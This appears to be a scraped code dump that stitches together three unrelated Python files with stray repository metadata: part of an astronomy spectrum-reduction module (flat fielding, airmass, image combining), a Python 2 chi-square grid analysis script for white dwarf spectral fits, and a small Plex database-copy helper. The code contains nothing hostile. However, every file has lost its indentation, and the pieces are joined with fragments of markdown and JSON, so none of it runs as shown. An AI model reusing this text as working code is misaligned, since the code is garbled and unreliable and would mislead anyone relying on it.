def Flat_Field( spec_list, flat ):
# This Function divides each spectrum in spec_list by the flat and writes
# The new images as fits files. The output is a list of file names of
# the flat fielded images.
print("\n====================\n")
print('Flat Fielding Images by Dividing by %s\n' % (flat))
np.seterr(divide= 'warn')
flat_data = fits.getdata(flat)
'''
#If flat is a blue spectrum, find the Littrow ghost and add those pixels to the header
if 'blue' in flat.lower():
#See if littrow_ghost.txt already exists
file_exist = glob('littrow_ghost.txt')
if len(file_exist) == 1:
littrow_location = np.genfromtxt('littrow_ghost.txt')
littrow_ghost = [littrow_location[0],littrow_location[1]]
fit_data = np.median(flat_data[75:85],axis=0)
low_index = 1210. #Lowest pixel to search within
high_index = 1710. #highest pixel to search within
fit_data1 = fit_data[low_index:high_index]
fit_pix1 = np.linspace(low_index,low_index+len(fit_data1),num=len(fit_data1))
diagnostic[0:len(fit_pix1),17] = fit_pix1
diagnostic[0:len(fit_data1),18] = fit_data1
diagnostic[0,21] = littrow_ghost[0]
diagnostic[1,21] = littrow_ghost[1]
else:
littrow_ghost = find_littrow(flat)
litt_low = int(littrow_ghost[0])
litt_hi = int(littrow_ghost[1])
try:
hduflat = fits.getheader(flat)
stitchloc = hduflat['STITCHLO']
#print stitchloc
except:
stitchloc = 'None'
pass
else:
littrow_ghost = 'None'
stitchloc = 'None'
'''
f_spec_list = []
if isinstance(spec_list,str):
spec_list = [spec_list] #Ensure that spec_list is actually a list
for spec in spec_list:
spec_data = fits.getdata(spec)
f_spec_data = np.divide(spec_data, flat_data)
f_spec_data[ np.isnan(f_spec_data) ] = 0
print("f"+"%s Mean: %.3f StDev: %.3f" % (spec, np.mean(f_spec_data), np.std(f_spec_data) ))
hdu = fits.getheader(spec)
Fix_Header(hdu)
hdu.set('DATEFLAT', datetime.datetime.now().strftime("%Y-%m-%d"), 'Date of Flat Fielding')
hdu.append( ('FLATFLD', flat,'Image used to Flat Field.'),
useblanks= True, bottom= True )
NewHdu = fits.PrimaryHDU(data= f_spec_data, header= hdu)
#new_file_name= check_file_exist('f'+spec)
new_file_name= 'f'+spec
NewHdu.writeto(new_file_name, output_verify='warn', clobber= True)
f_spec_list.append(new_file_name)
return f_spec_list
# ===========================================================================
def SetAirMass(img, lat= -30.238, scale= 750):
# This Function Calculates The Effective Airmass of a single image
# Inputs:
# img = image name
# lat = latitude of observer in decimal degrees.
# (Default Soar lat: '-30:14:16.8' = -30.238 deg)
# scale = atmospheric scale factor 750
# Output:
# AMeff = effective airmass for single image
# Image Info #
hdulist = fits.open(img, 'update')
hdu = hdulist[0]
Fix_Header(hdu.header)
ra = decimal_ra( hdu.header['RA'] ) # hours
dec = decimal_dec( hdu.header['DEC'] ) # deg
lst_st = decimal_ra( hdu.header['LST'] ) # start exposure LST in hours
exp = hdu.header['EXPTIME'] # sec
lst_mid = lst_st + (exp/2.)/3600. # mid exposure LST in hours
lst_end = lst_st + (exp)/3600. # end exposure LST in hours
# Air Mass Calculations #
times = [lst_st, lst_mid, lst_end]
AM = []
for t in times:
alt, az, ha = RaDec2AltAz(ra, dec, lat, t )
airmass = AirMass(alt, scale)
AM.append( airmass )
AMeff = EffectiveAirMass(AM[0], AM[1], AM[2])
# Print and write to header #
print('\nImage:', img)
print('Observatory Latitude: %s' % lat)
print('AM_st AM_mid AM_end AM_eff')
print('%5.4f %5.4f %5.4f %5.4f' % (AM[0], AM[1], AM[2], AMeff))
hdu.header.set( 'AIRMASS', np.round(AMeff,6) ,
'Calculated Effective Airmass' )
hdulist.close()
return AMeff
# ===========================================================================
def imcombine(im_list, output_name, method,
lo_sig = 10, hi_sig = 3, overwrite= False, mask=False):
# Image Combination Script #
# Inputs:
# im_list = mist be a python list of images or "@listfile"
# output_name = name of combined fits image
# method = The method to use for combining (median, average, sum)
# lo_sig = low sigma cliping factor (default = 3 sigma)
# hi_sig = high sigma cliping factor (default = 3 sigma)
# overwrite = if true go ahead and re write existing file 'output_name'
# if false it will warn you and ask for new output_name.
# (default false)
# Output:
# After succefully combining, calculateing airmass, and writing to fits file,
# The return of this function is the name of the combined
# image (Output_name).
print("\n====================\n")
print("Combining Images:")
print("Using %s of count values." % method)
print("Sigma Cliping Factors (low, high): (%s, %s)\n" % (lo_sig, hi_sig))
# Read image data and put it in a numpy block #
Ni = len(im_list)
for i in range(0, Ni):
# First size the array to contain the data based on 1st image #
# Create block with 3 axis:
# axis[0] has length of number of images.
# axis[1] is the vertical axis of the chip.
# axis[2] is the horizontal axis of the chip.
if i == 0:
img_data = fits.getdata(im_list[i])
#n,Ny,Nx = np.shape(img_data)
Ny = img_data.shape[-2]
Nx = img_data.shape[-1]
img_block = np.ndarray( shape= (Ni,Ny,Nx) )
img_block[i,:,:] = img_data
if (not mask) is False:
mask_data = fits.getdata(mask[i])
mask_block = np.ndarray(shape= (Ni,Ny,Nx) )
mask_block[i,:,:] = mask_data
# Then go ahead and read the rest of the images into the block #
else:
img_block[i,:,:] = fits.getdata(im_list[i])
if (not mask) is False:
mask_block[i,:,:] = fits.getdata(mask[i])
# set nan values to zero #
img_block[ np.isnan(img_block) ] = 0
# If Zero Additive Scale Images #
if im_list[0].lower().__contains__("zero"):
img_block, Scale = Add_Scale(img_block)
# If Flats Multiplicative Scale Images #
elif im_list[0].lower().__contains__("flat"):
index = 1.
img_block, Scale= Mult_Scale(img_block,index)
'''
if im_list[0].lower().__contains__("blue"):
index = 1.
img_block, Scale= Mult_Scale(img_block,index)
elif im_list[0].lower().__contains__("red"):
index = 2.
img_block, Scale= Mult_Scale(img_block,index)
'''
# If Not, Dont Scale #
else:
print("Did Not Scale Images.\n")
Scale= np.empty(Ni)
Scale[:]= np.NaN
# Print Name and Statistics of Each image %
avgarr,stdarr = np.zeros(Ni), np.zeros(Ni)
for i in range(0,Ni):
#Avg= np.mean(img_block[i,25:75,1700:1800])
#Std= np.std(img_block[i,25:75,1700:1800])
Avg = np.mean(img_block[i,:,:])
Std = np.std(img_block[i,:,:])
avgarr[i] = Avg
stdarr[i] = Std
print( "%02d: %s ScaleValue:% .3f Mean: %.3f StDev: %.3f"
% (i, im_list[i], Scale[i], Avg, Std) )
#Save Values to diagnostic array
try:
if im_list[0].lower().__contains__("zero"):
diagnostic[0:len(avgarr),1] = avgarr
diagnostic[0:len(stdarr),2] = stdarr
if im_list[0].lower().__contains__("flat"):
diagnostic[0:len(avgarr),5] = avgarr
diagnostic[0:len(stdarr),6] = stdarr
except:
pass
## Combine the images acording to input "method" using SigmaClip() above ##
comb_img = np.ndarray( shape= (1,Ny,Nx), dtype='float32')
##mask_img = np.ndarray( shape= (1,Ny,Nx), dtype='float32')
while True: # Contunualy askes for method if input is wierd #
if method == 'median':
for y in range(0,Ny):
for x in range(0,Nx):
counts = img_block[:,y,x]
val = np.median( SigClip(counts, lo_sig, hi_sig) )
comb_img[0,y,x] = np.float32(val)
break # exit while loop
elif method == 'average':
for y in range(0,Ny):
for x in range(0,Nx):
if (not mask) is False:
counts = img_block[:,y,x]
masks = mask_block[:,y,x].astype(bool)
mx = np.ma.masked_array(counts,masks)
val = mx.mean() #We don't want to sigma clip if already masking
#if True in masks:
# print counts
# print masks
# print val
# print ''
else:
counts = img_block[:,y,x]
#counts_good, counts_bad = SigClip(counts, lo_sig, hi_sig)
val = np.average( SigClip(counts, lo_sig, hi_sig) )
#val = np.average(counts_good)
comb_img[0,y,x] = np.float32(val)
#mask = np.average(counts_bad)
#mask_img[0,y,x] = np.float32(mask)
#mask_image = fits.PrimaryHDU(data=mask_img)
#mask_image.writeto('Mask.fits')
break # exit while loop
elif method == 'sum':
for y in range(0,Ny):
for x in range(0,Nx):
counts = img_block[:,y,x]
val = np.sum( SigClip(counts, lo_sig, hi_sig) )
comb_img[0,y,x] = np.float32(val)
#print img_block[:,100,50]
#print comb_img[:,100,50]
break # exit while loop
else:
# if 'method' input is wanky, ask for method again.
print("\nError: Method NOT AVALABLE.")
print("Available Methods: ('median', 'average', 'sum')")
print("Enter Valid Method")
method = input('>>>')
# Set NAN values to zero
comb_img[ np.isnan(comb_img) ] = np.float32(0)
###### Calculate Effetive Airmass for combined image ######
# The EffAM value is writen into the header in the next section #
print('\nCalculating Effective Airmass:')
# if were just combining 2 images #
if Ni == 2:
AM0 = SetAirMass(im_list[0])
AM2 = SetAirMass(im_list[1])
AM1 = (AM0+AM2)/2
EffAM = EffectiveAirMass(AM0, AM1, AM2)
print('\nEffective Airmass of combined image: %5.4f' % EffAM)
# if were combining an odd number of images #
elif Ni%2 == 1:
images = [ im_list[0], im_list[Ni//2], im_list[-1] ]
AM = [ SetAirMass(img) for img in images ]
EffAM = EffectiveAirMass( AM[0], AM[1], AM[2] )
print('\nEffective Airmass of combined image: %5.4f' % EffAM)
# if were combing an even number of images #
elif Ni%2 == 0:
images = [im_list[0], im_list[(Ni//2)-1], im_list[Ni//2], im_list[-1]]
AM = [ SetAirMass(img) for img in images ]
EffAM = EffectiveAirMass( AM[0], (AM[1]+AM[2])/2, AM[3])
print('\nEffective Airmass of combined image: %5.4f' % (EffAM))
# Otherwise we fail #
else:
print("Eff AirMass calculation failed? This never happens!")
###### Overwrite Protection loop, just in case ######
if overwrite == False:
from os.path import isfile
while overwrite == False: # Outer Loop #
# Breaks if file name doesnot exist or overwrite == true #
exist = isfile(output_name) # Asks computer if file name exist #
if exist == False:
print("\nWriting combined image to fits file",output_name,"...")
break # Break out of outter loop and continue writing #
elif exist == True:
while True: # Inner Loop #
# Breaks if user wishes to overwite, abort, or gives new name.
# loop also checks new names for existance.
print("\nFile name",output_name,)
print("already exist do you wish to overwrite?")
yes_no = input('yes or no ?>>>')
if yes_no == 'no':
# If overwrite no: prompt new name or abort #
print("\nEnter new file name or Ctrl-c to Abort ")
output_name = input('>>>')
print("\nNew File Name:= ", output_name)
break # breaks out of Inner loop only.
# Code proceeds to Outer Loop to
# ask computer if new file name exist.
elif yes_no == 'yes':
# If overwrite yes: Break Inner Loop and Outer loop #
overwrite = True
print("\nOverwriting Image:", output_name)
break
else:
# If yes_no input is wierd return to Inner loop
# to ask question again.
print("\nInput Not Recognized.")
###### The following part only runs if above while loop is satisfied ######
# Copy header of first image in im_list and fix degree symbol issue.
hdulist = fits.open(im_list[0])
hdu = hdulist[0]
# This checks the string and deletes the bad keywords from header.
Fix_Header(hdu.header)
# Write Effective Airmass into header #
hdu.header.set('AIRMASS',np.round(EffAM,6),'Calculated Effective Airmass')
#Write date of image combination to header #
hdu.header.set('DATECOMB', datetime.datetime.now().strftime("%Y-%m-%d"), 'Date of Image combination')
# Write the imcombine information into header #
N = len(im_list)
for i in range(0,N):
num = str(i+1).zfill(3)
key = 'IMCMB'+num
hdu.header.append( (key, im_list[i]), useblanks= True, bottom= True )
hdu.header.append( ('NCOMBINE', N), useblanks= True, bottom = True )
hdu.header.append( ('COMBTYPE', method,'Operation Used to Combine'),
useblanks= True, bottom= True )
# Make sure header BITPIX reflects data encodeing as float 32 ie: -32
hdu.header['BITPIX'] = -32
# Write header to new fits file
#new_file_name= check_file_exist(output_name)
new_file_name= output_name
hdu.writeto(new_file_name, output_verify='warn', clobber= True)
# write combined data to new fits file #
fits.update(output_name, data= comb_img, header= hdu.header,
output_verify='warn')
print( "\nCombined Image: %s Mean: %.3f StDev: %.3f"
% (new_file_name, np.mean(comb_img), np.std(comb_img)) )
return new_file_name
# ===========================================================================
# ===========================================================================
# ===========================================================================
``` |
{
"source": "joshfuchs/ZZCeti_analysis",
"score": 3
} |
#### File: joshfuchs/ZZCeti_analysis/computechi.py
```python
import numpy as np
import os
import mpfit
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from scipy.interpolate import RectBivariateSpline
import analysis_tools as at
def parabola(x,p):
return p[0] + p[1]*x + p[2]*x**2.
def fitparabola(p,fjac=None,x=None,y=None,err=None):
model = parabola(x,p)
status = 0
return([status,(y-model)/err])
def polynomial2(x,y,p):
return p[0] + p[1]*x + p[2]*x**2. + p[3]*x*y + p[4]*y**2. + p[5]*y
def fitpolynomial2(p,fjac=None,x=None,y=None,z=None,err=None):
model = polynomial2(x,y,p)
status = 0
return([status,(z-model)/err])
def polynomial3(x,y,p):
return p[0] + p[1]*x + p[2]*x**2. + p[3]*x**3. + p[4]*x**2.*y + p[5]*x*y + p[6]*x*y**2. + p[7]*y**3. + p[8]*y**2. + p[9]*y
def fitpolynomial3(p,fjac=None,x=None,y=None,z=None,err=None):
model = polynomial3(x,y,p)
status = 0
return([status,(z-model)/err])
def paraboloid(x,y,p):
return p[0]*(((x-p[1])/p[2])**2. + ((y-p[3])/p[4])**2.) + p[5]
def fitparaboloid(p,fjac=None,x=None,y=None,z=None,err=None):
model = paraboloid(x,y,p)
status = 0
return([status,(z-model)/err])
#os.chdir('/afs/cas.unc.edu/depts/physics_astronomy/clemens/students/group/modelfitting/Koester_06/RESULTS')
wdname = 'wcftb.WD1422p095_930_blue_flux_master'
datedone = '06-20_4.28.txt'
cutteff = False
teff_limit = 14000.
#Set up filenames to read
allfile = 'chi_' + wdname + '_' + datedone
print 'File: ', allfile
alphafile = 'chi_' + wdname + '_alpha_' + datedone
betafile = 'chi_' + wdname + '_beta_' + datedone
gammafile = 'chi_' + wdname + '_gamma_' + datedone
deltafile = 'chi_' + wdname + '_delta_' + datedone
epsilonfile = 'chi_' + wdname + '_epsilon_' + datedone
H8file = 'chi_' + wdname + '_H8_' + datedone
H9file = 'chi_' + wdname + '_H9_' + datedone
H10file = 'chi_' + wdname + '_H10_' + datedone
#Read in first grid to determine range of spacing of variables
with open(allfile,'r') as f:
first_line = f.readline()
try:
bottomg,stepg,topg,bottomt,stept,topt,numpoints = [float(x) for x in first_line[2:].split(",")]
except:
bottomg,stepg,topg,bottomt,stept,topt = [float(x) for x in first_line[2:].split(",")]
teff = np.linspace(bottomt,topt,(topt-bottomt)/stept+1.,endpoint=True)
logg = np.linspace(bottomg,topg,(topg-bottomg)/stepg+1.,endpoint=True)
teffgrid, logggrid = np.meshgrid(teff,logg)
'''
#Set up grid. This is saved in the header of the chi*txt file
bottomt = 10000.
topt = 15000.
stept = 10.
teff = np.linspace(bottomt,topt,(topt-bottomt)/stept+1.,endpoint=True)
bottomg = 7.0
topg = 9.5
stepg = 0.05
logg = np.linspace(bottomg,topg,(topg-bottomg)/stepg+1.,endpoint=True)
teffgrid, logggrid = np.meshgrid(teff,logg)
'''
#Read in saved grids
allchi = np.genfromtxt(allfile,dtype='d')
try:
alphachi = np.genfromtxt(alphafile,dtype='d')
except:
print 'No H-alpha file \n'
pass
betachi = np.genfromtxt(betafile,dtype='d')
gammachi = np.genfromtxt(gammafile,dtype='d')
deltachi = np.genfromtxt(deltafile,dtype='d')
epsilonchi = np.genfromtxt(epsilonfile,dtype='d')
H8chi = np.genfromtxt(H8file,dtype='d')
H9chi = np.genfromtxt(H9file,dtype='d')
H10chi = np.genfromtxt(H10file,dtype='d')
'''
#Convert to reduced chi-square
allchi /= numpoints
try:
alphachi /= numpoints
except:
pass
betachi /= numpoints
gammachi /= numpoints
deltachi /= numpoints
epsilonchi /= numpoints
H8chi /= numpoints
H9chi /= numpoints
H10chi /= numpoints
'''
#combine different lines
print 'Shape: ', allchi.shape
combined = betachi + gammachi + deltachi + epsilonchi + H8chi + H9chi + H10chi#alphachi + betachi + gammachi + deltachi + epsilonchi + H8chi + H9chi + H10chi
try:
a10chi = alphachi + betachi + gammachi + deltachi + epsilonchi + H8chi + H9chi + H10chi
except:
pass
b10chi = betachi + gammachi + deltachi + epsilonchi + H8chi + H9chi + H10chi
g10chi = gammachi + deltachi + epsilonchi + H8chi + H9chi + H10chi
g9chi = gammachi + deltachi + epsilonchi + H8chi + H9chi
g8chi = gammachi + deltachi + epsilonchi + H8chi
b9chi = betachi + gammachi + deltachi + epsilonchi + H8chi + H9chi
b8chi = betachi + gammachi + deltachi + epsilonchi + H8chi
#specify a portion of the grid to extract
#lowg, highg = 7.75, 8.25
#lowgindex, highgindex = np.where(logg == lowg), np.where(logg == highg)
#loggsmall = logg[lowgindex[0]:highgindex[0]+1]
#lowt, hight = 12250., 12750.
#lowtindex, hightindex = np.where(teff == lowt), np.where(teff == hight)
#teffsmall = teff[lowtindex[0]:hightindex[0]+1]
#plot wireframe and scatter plot of chi-square values
fig = plt.figure(1)
ax = fig.gca(projection='3d')
sur = ax.plot_wireframe(teffgrid,logggrid,combined,rstride=1,cstride=1)
#ax.scatter(np.ravel(teffgrid),np.ravel(logggrid),np.ravel(combined),marker='o',s=30,c='r')
#plt.show()
#exit()
#Determine minimum values of each grid
allindex = np.unravel_index(allchi.argmin(),allchi.shape)
alllogg, allteff = logg[allindex[0]], teff[allindex[1]]
#print 'All: ' , alllogg, allteff
try:
alphaindex = np.unravel_index(alphachi.argmin(),alphachi.shape)
alphalogg, alphateff = logg[alphaindex[0]], teff[alphaindex[1]]
#print 'Alpha: ' , alphalogg, alphateff
except:
pass
betaindex = np.unravel_index(betachi.argmin(),betachi.shape)
betalogg, betateff = logg[betaindex[0]], teff[betaindex[1]]
#print 'Beta: ' , betalogg, betateff
gammaindex = np.unravel_index(gammachi.argmin(),gammachi.shape)
gammalogg, gammateff = logg[gammaindex[0]], teff[gammaindex[1]]
#print 'Gamma: ' , gammalogg, gammateff
deltaindex = np.unravel_index(deltachi.argmin(),deltachi.shape)
deltalogg, deltateff = logg[deltaindex[0]], teff[deltaindex[1]]
#print 'Delta: ' , deltalogg, deltateff
epsilonindex = np.unravel_index(epsilonchi.argmin(),epsilonchi.shape)
epsilonlogg, epsilonteff = logg[epsilonindex[0]], teff[epsilonindex[1]]
#print 'Epsilon: ' , epsilonlogg, epsilonteff
H8index = np.unravel_index(H8chi.argmin(),H8chi.shape)
H8logg, H8teff = logg[H8index[0]], teff[H8index[1]]
#print 'H8: ' , H8logg, H8teff
H9index = np.unravel_index(H9chi.argmin(),H9chi.shape)
H9logg, H9teff = logg[H9index[0]], teff[H9index[1]]
#print 'H9: ' , H9logg, H9teff
H10index = np.unravel_index(H10chi.argmin(),H10chi.shape)
H10logg, H10teff = logg[H10index[0]], teff[H10index[1]]
#print 'H10: ' , H10logg, H10teff
combinedindex = np.unravel_index(combined.argmin(),combined.shape)
combinedlogg, combinedteff = logg[combinedindex[0]], teff[combinedindex[1]]
#print 'Combined: ' , combinedlogg, combinedteff
#exit()
#Print the chi-square value of a particular grid at a particular point
#loggwant = np.abs(logg-8.25).argmin()
#teffwant = np.abs(teff-13000).argmin()
#print allchi[loggwant,teffwant]
#Print values along a particular row
#teffwant = np.where(teff == 13900)
#loggwant = np.where(logg == 7.95)
#print H10chi[loggwant,:]
#print H10chi[:,teffwant]
#plt.clf()
#plt.plot(teff,np.array(H10chi[loggwant,:][0][0]))
#plt.show()
#======================================
#Remove part of the chi-square grid in a secondary solution is being found.
if cutteff:
########
#Upper limit on Teff
########
#teff_limit = 14500.
print combined.shape
teffcut = np.abs(teff-teff_limit).argmin()
print teffcut
teff = teff[0:teffcut]
#print len(teff_new)
combined = combined[:,0:teffcut]
betachi = betachi[:,0:teffcut]
H9chi = H9chi[:,0:teffcut]
H8chi = H8chi[:,0:teffcut]
H10chi = H10chi[:,0:teffcut]
b10chi = b10chi[:,0:teffcut]
g10chi = g10chi[:,0:teffcut]
g9chi = g9chi[:,0:teffcut]
deltachi = deltachi[:,0:teffcut]
epsilonchi = epsilonchi[:,0:teffcut]
b9chi = b9chi[:,0:teffcut]
b8chi = b8chi[:,0:teffcut]
g8chi = g8chi[:,0:teffcut]
try:
alphachi = alphachi[:,0:teffcut]
a10chi = a10chi[:,0:teffcut]
except:
pass
'''
#######
#Lower limit on Teff
teff_limit = 14700.
print combined.shape
teffcut = np.abs(teff-teff_limit).argmin()
print teffcut
teff = teff[teffcut:]
#print len(teff_new)
combined = combined[:,teffcut:]
H10chi = H10chi[:,teffcut:]
'''
#Find solution for whatever combinations you want
try:
print '\nAlpha:'
ateff,atefferr,alogg,aloggerr = at.find_solution(alphachi,logg,teff)
print '\nAlpha-10:'
a10teff,a10tefferr,a10logg,a10loggerr = at.find_solution(a10chi,logg,teff)
except:
pass
#exit()
print '\nBeta:'
bteff,btefferr,blogg,bloggerr = at.find_solution(betachi,logg,teff)
print '\nGamma:'
gteff,gtefferr,glogg,gloggerr = at.find_solution(gammachi,logg,teff)
print '\nDelta:'
dteff,dtefferr,dlogg,dloggerr = at.find_solution(deltachi,logg,teff)
print '\nEpsilon:'
eteff,etefferr,elogg,eloggerr = at.find_solution(epsilonchi,logg,teff)
print '\nH8:'
H8teff,H8tefferr,H8logg,H8loggerr = at.find_solution(H8chi,logg,teff)
print '\nH9:'
H9teff,H9tefferr,H9logg,H9loggerr = at.find_solution(H9chi,logg,teff)
print '\nH10:'
H10teff,H10tefferr,H10logg,H10loggerr = at.find_solution(H10chi,logg,teff)
print '\nBeta - H10:'
b10teff,b10tefferr,b10logg,b10loggerr = at.find_solution(b10chi,logg,teff)
print '\nGamma - H10:'
g10teff,g10tefferr,g10logg,g10loggerr = at.find_solution(g10chi,logg,teff)
print '\nGamma - H9:'
g9teff,g9tefferr,g9logg,g9loggerr = at.find_solution(g9chi,logg,teff)
print '\nBeta - H9:'
b9teff,b9tefferr,b9logg,b9loggerr = at.find_solution(b9chi,logg,teff)
print '\nBeta - H8:'
b8teff,b8tefferr,b8logg,b8loggerr = at.find_solution(b8chi,logg,teff)
print '\nGamma - H8:'
g8teff,g8tefferr,g8logg,g8loggerr = at.find_solution(g8chi,logg,teff)
#print '\nCombined:'
#combinedteff,combinedtefferr,combinedlogg,combinedloggerr = at.find_solution(combined,logg,teff)
#exit()
#interpolation = RectBivariateSpline(loggsmall,teffsmall,combinedsmall,kx=3,ky=3,s=0)
interpolation = RectBivariateSpline(logg,teff,combined,kx=3,ky=3,s=0)
#lowchi = interpolation(loggval.min(),bestteff)
levels = [1,2,3,10,100,200,300,400,500,600,700] # range(0,1000,300)
#plot contour plot
plt.figure()
#CS = plt.contour(teff,loggsmall,combinedsmall-lowchi)#,levels=levels)
CS = plt.contourf(teff,logg,b9chi,100,cmap='jet')#,levels=levels)
plt.colorbar(CS)
plt.xlim(15000,10000)
plt.ylim(9.5,7.0)
#plt.plot(bestteff,loggval.min(),'^')
#plt.xlim(bestteff+250.,bestteff-250.)
#plt.ylim(loggval.min()+0.25,loggval.min()-0.25)
#plt.clabel(CS,inline=1,fontsize=10)
plt.show()
#Check out the following with a smaller grid
###cs = plt.pcolor(teffsmall,loggsmall,combinedsmall-tpp(bestteff))
###cb = plt.colorbar(cs)
exit() #Below this is some code to fit an elliptic paraboloid to the surface, as well as doing a cubic spline interpolation. These are just other options.
'''
#Fit a different order polynomial
guess = np.zeros(10)
xes = allchi[5,:8]
yes = allchi[:8,5]
pol = np.polyfit(xes,yes,3)
pol2 = np.polyfit(yes,xes,3)
guess[0] = allchi.min()
guess[1] = pol[2]
guess[2] = pol[1]
guess[3] = pol[0]
guess[4] = 1.
guess[5] = 1.
guess[6] = 5.
guess[7] = pol2[0]
guess[8] = pol2[1]
guess[9] = pol2[2]
fa = {'x':np.ravel(teffgrid),'y':np.ravel(logggrid),'z':np.ravel(allchi),'err':np.ravel(error)}
params = mpfit.mpfit(fitpolynomial3,guess,functkw=fa,quiet=True)
zz = polynomial3(teffgrid,logggrid,params.params)
#Fine minimum of fit from coarse grid
fitindex = np.unravel_index(zz.argmin(),zz.shape)
fitlogg, fitteff = logg[fitindex[0]],teff[fitindex[1]]
print 'Fit: ', fitlogg, fitteff
zztest = polynomial3(tefftestgrid,loggtestgrid,params.params)
fitindextest = np.unravel_index(zztest.argmin(),zztest.shape)
fitloggtest, fittefftest = loggtest[fitindextest[0]],tefftest[fitindextest[1]]
print 'Fit: ', fitloggtest, fittefftest
#Plot all Chi square points and the fit
fig3 = plt.figure(3)
ax3 = fig3.gca(projection='3d')
surf3 = ax3.plot_surface(teffgrid,logggrid,zz,rstride=1,cstride=1,shade=False,cmap='jet')
plt.draw()
ax3.scatter(np.ravel(teffgrid),np.ravel(logggrid),np.ravel(allchi),marker='o',s=30)
surf3.set_edgecolors(surf3.to_rgba(surf3._A))
surf3.set_facecolors('white')
#plt.show()
#Calculate residuals and show those too
residuals = zz - allchi
fig4 = plt.figure(4)
ax4 = fig4.gca(projection='3d')
surf4 = ax4.plot_surface(teffgrid,logggrid,residuals,rstride=1,cstride=1,shade=False,cmap='jet')
#plt.draw() #use this if you don't want it filled in
surf4.set_edgecolors(surf4.to_rgba(surf4._A))
surf4.set_facecolors('white')
plt.show()
'''
#Try fitting a polynomial to the smaller subset
error = np.ones([len(loggsmall),len(teffsmall)])
#print loggsmall
#print teffsmall
xes = combinedsmall[len(loggsmall)//2,:]
#print xes
yes = combinedsmall[:,len(teffsmall)/2]
#print yes
pol = np.polyfit(teffsmall,xes,2)
pol2 = np.polyfit(loggsmall,yes,2)
#2-order in both directions
#guess = np.zeros(6)
#guess[0] = combinedsmall.min()
#guess[1] = pol[1]
#guess[2] = pol[0]
#guess[3] = 1.
#guess[4] = pol2[1]
#guess[5] = pol2[0]
'''
#3-order in both directions
guess = np.zeros(10)
guess[0] = combinedsmall.min()
guess[1] = pol[2]
guess[2] = pol[1]
guess[3] = pol[0]
guess[4] = 1.
guess[5] = 1.
guess[6] = 5.
guess[7] = pol2[0]
guess[8] = pol2[1]
guess[9] = pol2[2]
'''
#Elliptic paraboloid
guess = np.zeros(6)
guess[0] = 0.4
guess[1] = teff[combinedindex[1]]
guess[2] = (teffsmall[1] - teffsmall[0]) / (combinedsmall[0,1] - combinedsmall[0,0] ) #15.
guess[3] = logg[combinedindex[0]]
guess[4] = (loggsmall[1] - loggsmall[0]) / (combinedsmall[1,0] - combinedsmall[0,0] )#0.005
guess[5] = combinedsmall.min()
#print guess
fa = {'x':np.ravel(teffsmallgrid),'y':np.ravel(loggsmallgrid),'z':np.ravel(combinedsmall),'err':np.ravel(error)}
#params = mpfit.mpfit(fitpolynomial2,guess,functkw=fa,quiet=True)
params = mpfit.mpfit(fitparaboloid,guess,functkw=fa,quiet=True,maxiter=1000)
print params.status, params.niter, params.fnorm, params.dof
#zz = polynomial2(teffsmallgrid,loggsmallgrid,params.params)
zz = paraboloid(teffsmallgrid,loggsmallgrid,params.params)
guessfit = paraboloid(teffsmallgrid,loggsmallgrid,guess)
#Fine minimum of fit from coarse grid
fitindex = np.unravel_index(zz.argmin(),zz.shape)
fitlogg, fitteff = loggsmall[fitindex[0]],teffsmall[fitindex[1]]
#print 'Fit: ', fitlogg, fitteff
zztest = paraboloid(teffsmallfinegrid,loggsmallfinegrid,params.params)
#zztest = polynomial2(teffsmallfinegrid,loggsmallfinegrid,params.params)
fitindextest = np.unravel_index(zztest.argmin(),zztest.shape)
fitloggtest, fittefftest = loggsmallfine[fitindextest[0]],teffsmallfine[fitindextest[1]]
print 'logg fit: ', fitloggtest
print 'Teff fit: ', fittefftest
#Plot all Chi square points and the fit
fig3 = plt.figure(3)
ax3 = fig3.gca(projection='3d')
surf3 = ax3.plot_surface(teffsmallgrid,loggsmallgrid,zz,rstride=1,cstride=1,shade=False,cmap='jet')
#surf3 = ax3.plot_surface(teffsmallgrid,loggsmallgrid,guessfit,rstride=1,cstride=1,shade=False,cmap='jet')
#surf3 = ax3.plot_surface(teffsmallfinegrid,loggsmallfinegrid,zztest,rstride=1,cstride=1,shade=False,cmap='jet')
plt.draw()
ax3.scatter(np.ravel(teffsmallgrid),np.ravel(loggsmallgrid),np.ravel(combinedsmall),marker='o',s=30)
ax3.scatter(fittefftest,fitloggtest,zztest.min(),marker='o',c='r',s=60)
surf3.set_edgecolors(surf3.to_rgba(surf3._A))
surf3.set_facecolors('white')
#plt.show()
#Calculate residuals and show those too
residuals = zz - combinedsmall
fig4 = plt.figure(4)
ax4 = fig4.gca(projection='3d')
surf4 = ax4.plot_surface(teffsmallgrid,loggsmallgrid,residuals,rstride=1,cstride=1,shade=False,cmap='jet')
#plt.draw() #use this if you don't want it filled in
surf4.set_edgecolors(surf4.to_rgba(surf4._A))
surf4.set_facecolors('white')
#plt.show()
#Find delta chi square == 1 surface
deltazztest = zztest - zztest.min()
oldglist = []
oldtlist = []
n,m = 0,0
for j in teffsmallfine:
m = 0
for i in loggsmallfine:
if deltazztest[m,n] <= 1.:
oldglist.append(i)
oldtlist.append(j)
m += 1
n += 1
#print np.amin(oldglist),np.amax(oldglist)
#print np.amin(oldtlist),np.amax(oldtlist)
print 'logg error: ',(np.amax(oldglist)-np.amin(oldglist))/2.
print 'Teff error: ',(np.amax(oldtlist)-np.amin(oldtlist))/2.
plt.show()
#===================
#cubic spline interpolation of grid
interpolation = RectBivariateSpline(logg,teff,combined,kx=3,ky=3,s=0)
glist = []
tlist = []
newgrid = np.empty([len(loggsmallfine),len(teffsmallfine)])
print 'Reading off new values'
n,m = 0,0
for j in teffsmallfine:
m = 0
for i in loggsmallfine:
newgrid[m,n] = interpolation(i,j)
if interpolation(i,j) <= 1000: #number is the max delta chi square we want
#print i,j,out(i,j)
glist.append(i)
tlist.append(j)
m += 1
n += 1
print 'Done reading off new values'
interpindex = np.unravel_index(newgrid.argmin(),newgrid.shape)
interplogg, interpteff = loggsmallfine[interpindex[0]], teffsmallfine[interpindex[1]]
print 'Interpolation: ' , interplogg, interpteff
``` |
{
"source": "josh-gaby/plex-movie-agent-mapper",
"score": 3
} |
#### File: plex-movie-agent-mapper/plexmovieagentmapper/dbcopy.py
```python
import os
import shutil
import tempfile
class DbCopy(object):
def __init__(self, original_path):
self._original_path = original_path
def __enter__(self):
temp_dir = tempfile.gettempdir()
base_path = os.path.basename(self._original_path)
self.path = os.path.join(temp_dir,base_path)
shutil.copy2(self._original_path, self.path)
return self.path
def __exit__(self,exc_type, exc_val, exc_tb):
os.remove(self.path)
```
